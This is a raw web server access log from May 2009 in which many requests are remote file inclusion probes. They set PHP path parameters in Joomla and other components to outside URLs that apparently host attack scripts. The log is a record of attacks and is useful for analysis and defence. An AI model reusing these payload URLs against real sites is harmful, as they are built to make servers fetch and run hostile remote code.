69.50.197.106 - - [31/May/2009:06:01:09 -0400] "GET /log/sdaglobal.org-access_log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 320
69.50.197.106 - - [31/May/2009:06:01:09 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 291
69.50.197.106 - - [31/May/2009:06:01:10 -0400] "GET /log/sdaglobal.org-access_log.4//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
116.36.213.166 - - [31/May/2009:06:01:21 -0400] "GET //index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 291
116.36.213.166 - - [31/May/2009:06:01:22 -0400] "GET /log/sdaglobal.org-access_log.1//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
116.36.213.166 - - [31/May/2009:06:01:23 -0400] "GET /log//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 295
74.208.111.178 - - [31/May/2009:06:01:37 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
74.208.111.178 - - [31/May/2009:06:01:37 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 324
83.231.138.99 - - [31/May/2009:06:02:06 -0400] "GET /log/sdaglobal.org-access_log.3//components/com_extcalendar/admin_events.php?CONFIG_EXT[****************S_DIR]=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 356
222.122.72.93 - - [31/May/2009:06:02:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:04:09 -0400] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 311
64.182.124.1 - - [31/May/2009:06:04:09 -0400] "GET /log//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58302
64.182.124.1 - - [31/May/2009:06:04:14 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
200.137.131.138 - - [31/May/2009:06:04:21 -0400] "GET /modules/coppermine/include/init.inc.php?CPG_M_DIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 320
69.50.197.106 - - [31/May/2009:06:04:27 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:04:27 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:04:53 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
64.182.124.1 - - [31/May/2009:06:05:00 -0400] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 313
64.182.124.1 - - [31/May/2009:06:05:00 -0400] "GET /log//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58302
216.191.52.68 - - [31/May/2009:06:05:15 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:06:33 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 315
222.122.72.93 - - [31/May/2009:06:06:37 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 324
69.50.197.106 - - [31/May/2009:06:06:59 -0400] "GET /log/sdaglobal.org-access_log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:06:59 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 324
88.40.90.61 - - [31/May/2009:06:07:04 -0400] "GET //admin/classes/errors.php?error=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 306
88.40.90.61 - - [31/May/2009:06:07:04 -0400] "GET /log//admin/classes/errors.php?error=http://shoemasterkorea.com/board/data/test.txt??? HTTP/1.1" 404 310
112.175.141.41 - - [31/May/2009:06:07:27 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
216.191.52.68 - - [31/May/2009:06:07:47 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://imagehut.ws/logopsd/baner.txt?? HTTP/1.1" 404 324
79.18.233.198 - - [31/May/2009:06:08:55 -0400] "GET /log/sdaglobal.org-access_log.3//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
116.36.213.166 - - [31/May/2009:06:09:55 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
116.36.213.166 - - [31/May/2009:06:10:02 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:10:28 -0400] "GET //?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
64.182.124.1 - - [31/May/2009:06:10:29 -0400] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 313
64.182.124.1 - - [31/May/2009:06:10:28 -0400] "GET /log//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58308
116.36.213.166 - - [31/May/2009:06:11:12 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:11:39 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 315
79.18.233.198 - - [31/May/2009:06:12:05 -0400] "GET /log/sdaglobal.org-access_log.3//components/errors.php?error=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
112.175.141.41 - - [31/May/2009:06:14:29 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
64.182.124.1 - - [31/May/2009:06:14:57 -0400] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 311
89.234.63.110 - - [31/May/2009:06:15:57 -0400] "GET /?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 9432
89.234.63.110 - - [31/May/2009:06:15:57 -0400] "GET /log/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 58304
89.234.63.110 - - [31/May/2009:06:16:02 -0400] "GET /?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 9432
89.234.63.110 - - [31/May/2009:06:16:03 -0400] "GET /log/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 200 58304
89.234.63.110 - - [31/May/2009:06:16:34 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 314
89.234.63.110 - - [31/May/2009:06:16:38 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/?GALLERY_BASEDIR=http://primkray.ru/clx/copyright? HTTP/1.1" 404 314
222.122.72.93 - - [31/May/2009:06:16:55 -0400] "GET /log/sdaglobal.org-access_log.3//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 322
116.36.213.166 - - [31/May/2009:06:17:50 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
211.203.180.144 - - [31/May/2009:06:17:55 -0400] "GET /log/sdaglobal.org-access_log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 364
116.36.213.166 - - [31/May/2009:06:17:57 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
218.146.255.11 - - [31/May/2009:06:18:25 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 324
121.0.141.241 - - [31/May/2009:06:18:25 -0400] "GET /log///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 309
121.0.141.241 - - [31/May/2009:06:18:26 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 338
121.0.141.241 - - [31/May/2009:06:18:26 -0400] "GET ///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 305
116.36.213.166 - - [31/May/2009:06:19:09 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 324
121.0.141.241 - - [31/May/2009:06:21:46 -0400] "GET /log/sdaglobal.org-access_log.4%20%20///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 338
218.146.255.11 - - [31/May/2009:06:24:52 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 324
213.246.62.35 - - [31/May/2009:06:26:29 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:06:26:30 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 329
213.246.62.35 - - [31/May/2009:06:26:36 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 356
213.246.62.35 - - [31/May/2009:06:28:51 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:06:28:51 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 329
213.246.62.35 - - [31/May/2009:06:28:51 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 356
213.246.62.35 - - [31/May/2009:06:29:18 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 325
213.246.62.35 - - [31/May/2009:06:29:18 -0400] "GET /log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 329
213.246.62.35 - - [31/May/2009:06:29:18 -0400] "GET /log/sdaglobal.org-access_log.1/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 356
213.246.62.35 - - [31/May/2009:06:31:17 -0400] "GET /log/sdaglobal.org-access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 356
121.0.141.241 - - [31/May/2009:06:34:45 -0400] "GET /log/sdaglobal.org-access_log.1///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 336
121.0.141.241 - - [31/May/2009:06:35:46 -0400] "GET /log/sdaglobal.org-access_log.4///vwar/backup/errors.php?error=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 336
213.246.62.35 - - [31/May/2009:06:38:09 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 358
74.208.111.178 - - [31/May/2009:06:38:56 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
74.208.111.178 - - [31/May/2009:06:38:56 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 326
74.208.111.178 - - [31/May/2009:06:38:56 -0400] "GET /log/sdaglobal.org-access_log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 351
195.56.55.217 - - [31/May/2009:06:39:34 -0400] "GET /log/sdaglobal.org-access_log.4//guildbank/searcharrays.php?addonDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 339
195.56.55.217 - - [31/May/2009:06:39:52 -0400] "GET //guildbank/searcharrays.php?addonDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 308
195.56.55.217 - - [31/May/2009:06:39:52 -0400] "GET /log//guildbank/searcharrays.php?addonDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 312
218.146.255.11 - - [31/May/2009:06:39:54 -0400] "GET /log/sdaglobal.org-access_log.3//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:40:03 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 326
69.50.197.106 - - [31/May/2009:06:40:03 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:40:03 -0400] "GET /log/sdaglobal.org-access_log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 351
69.50.197.106 - - [31/May/2009:06:40:06 -0400] "GET /log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 326
69.50.197.106 - - [31/May/2009:06:40:06 -0400] "GET /log/sdaglobal.org-access_log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 351
69.50.197.106 - - [31/May/2009:06:40:06 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 322
213.246.62.35 - - [31/May/2009:06:40:22 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 317
112.175.141.41 - - [31/May/2009:06:40:32 -0400] "GET /log/sdaglobal.org-access_log.3//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
69.50.197.106 - - [31/May/2009:06:40:54 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 353
74.208.111.178 - - [31/May/2009:06:41:07 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 353
69.50.197.106 - - [31/May/2009:06:41:11 -0400] "GET /log/sdaglobal.org-access_log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 353
195.56.55.217 - - [31/May/2009:06:41:47 -0400] "GET /log/sdaglobal.org-access_log.4%20//guildbank/searcharrays.php?addonDir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 340
69.50.197.106 - - [31/May/2009:06:41:56 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 355
74.208.111.178 - - [31/May/2009:06:42:00 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 355
69.50.197.106 - - [31/May/2009:06:42:02 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 355
121.0.141.241 - - [31/May/2009:06:43:33 -0400] "GET /phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 292
121.0.141.241 - - [31/May/2009:06:43:34 -0400] "GET /log/phphtml.php?htmlclass_path=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 296
115.132.147.106 - - [31/May/2009:06:44:42 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
213.246.62.35 - - [31/May/2009:06:46:23 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/superscan/id.txt? HTTP/1.1" 404 297
79.18.233.198 - - [31/May/2009:06:50:15 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:06:50:16 -0400] "GET //include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 305
79.18.233.198 - - [31/May/2009:06:50:16 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 309
81.92.97.90 - - [31/May/2009:06:55:36 -0400] "GET /log/errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 295
81.92.97.90 - - [31/May/2009:06:55:36 -0400] "GET /errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 291
81.92.97.90 - - [31/May/2009:06:55:36 -0400] "GET /log/remnantprophecy.sdaglobal.org-error_…/errors.php?error=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 344
213.246.62.35 - - [31/May/2009:06:56:45 -0400] "GET //guildbank/searcharrays.php?addonDir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 308
213.246.62.35 - - [31/May/2009:06:56:46 -0400] "GET /log//guildbank/searcharrays.php?addonDir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 312
211.203.180.144 - - [31/May/2009:06:58:23 -0400] "GET /log/sdaglobal.org-access_log.4/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 366
112.175.141.41 - - [31/May/2009:06:59:46 -0400] "GET //akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 297
112.175.141.41 - - [31/May/2009:06:59:47 -0400] "GET /log/sdaglobal.org-error_log%20%20//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327
112.175.141.41 - - [31/May/2009:06:59:47 -0400] "GET /log//akocomments.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 301
112.175.141.41 - - [31/May/2009:07:00:31 -0400] "GET /log//guildbank/searcharrays.php?addonDir=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 312
112.175.141.41 - - [31/May/2009:07:00:37 -0400] "GET //guildbank/searcharrays.php?addonDir=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 308
112.175.141.41 - - [31/May/2009:07:00:40 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//guildbank/searcharrays.php?addonDir=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 341
121.165.73.157 - - [31/May/2009:07:01:20 -0400] "GET /phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 292
121.165.73.157 - - [31/May/2009:07:01:21 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 296
121.165.73.157 - - [31/May/2009:07:01:52 -0400] "GET /phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 292
121.165.73.157 - - [31/May/2009:07:01:52 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 296
69.237.82.158 - - [31/May/2009:07:01:53 -0400] "GET /phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 292
69.237.82.158 - - [31/May/2009:07:01:55 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 296
69.237.82.158 - - [31/May/2009:07:02:20 -0400] "GET /log/phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 296
69.237.82.158 - - [31/May/2009:07:02:21 -0400] "GET /phphtml.php?htmlclass_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 292
213.246.62.35 - - [31/May/2009:07:02:28 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//guildbank/searcharrays.php?addonDir=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 341
79.18.233.198 - - [31/May/2009:07:04:54 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 334
79.18.233.198 - - [31/May/2009:07:04:54 -0400] "GET //include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 305
79.18.233.198 - - [31/May/2009:07:04:55 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 309
80.59.178.71 - - [31/May/2009:07:04:55 -0400] "GET /log/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 324
80.59.178.71 - - [31/May/2009:07:04:55 -0400] "GET /inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 320
80.59.178.71 - - [31/May/2009:07:04:55 -0400] "GET /log/sdaglobal.org-access_log.3/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 351
210.188.218.41 - - [31/May/2009:07:08:44 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 320
210.188.218.41 - - [31/May/2009:07:08:45 -0400] "GET //add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 289
210.188.218.41 - - [31/May/2009:07:08:47 -0400] "GET /log//add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 293
65.55.208.253 - - [31/May/2009:07:09:20 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.208.253 - - [31/May/2009:07:09:21 -0400] "GET /log/china.sdaglobal.org-access_log.4 HTTP/1.1" 200 370165
62.146.68.61 - - [31/May/2009:07:10:38 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 291
62.146.68.61 - - [31/May/2009:07:10:38 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324
62.146.68.61 - - [31/May/2009:07:10:38 -0400] "GET /log/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 295
62.146.68.61 - - [31/May/2009:07:10:49 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324
80.59.178.71 - - [31/May/2009:07:10:59 -0400] "GET /log/sdaglobal.org-access_log.3%20/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 352
62.146.68.61 - - [31/May/2009:07:11:06 -0400] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 291
62.146.68.61 - - [31/May/2009:07:11:06 -0400] "GET /log/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 295
62.146.68.61 - - [31/May/2009:07:11:06 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324
116.36.213.166 - - [31/May/2009:07:11:21 -0400] "GET /log/sdaglobal.org-access_log.3//index_php?option=com_sitemap&Itemid=&mosConfig_absolute_path=http://finance-911.com/done/.log/idxx.txt?? HTTP/1.1" 404 322
62.146.68.61 - - [31/May/2009:07:11:22 -0400] "GET /log/sdaglobal.org-access_log.4%20%20/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 324
210.188.218.41 - - [31/May/2009:07:13:10 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 320
210.188.218.41 - - [31/May/2009:07:13:11 -0400] "GET //add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 289
210.188.218.41 - - [31/May/2009:07:13:12 -0400] "GET /log//add.php?APB_rp=http://www.radekoncar.ru///administrator/components/com_virtuemart/id.txt? HTTP/1.1" 404 293
80.93.54.56 - - [31/May/2009:07:13:23 -0400] "GET /log/sdaglobal.org-access_log.1//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 320
80.93.54.56 - - [31/May/2009:07:13:24 -0400] "GET //add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 289
80.93.54.56 - - [31/May/2009:07:13:24 -0400] "GET /log//add.php?APB_rp=http://a22.altervista.org/id.txt? HTTP/1.1" 404 293
217.147.29.190 - - [31/May/2009:07:13:50 -0400] "GET /log/sdaglobal.org-access_log/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 310
217.147.29.190 - - [31/May/2009:07:13:50 -0400] "GET /?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 9432
217.147.29.190 - - [31/May/2009:07:13:50 -0400] "GET /log/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 200 58316
217.147.29.190 - - [31/May/2009:07:14:10 -0400] "GET /log/sdaglobal.org-access_log.4/?_zb_path=http://judilicious.bemky.com/original/modules/utils/simple.jpg? HTTP/1.1" 404 312
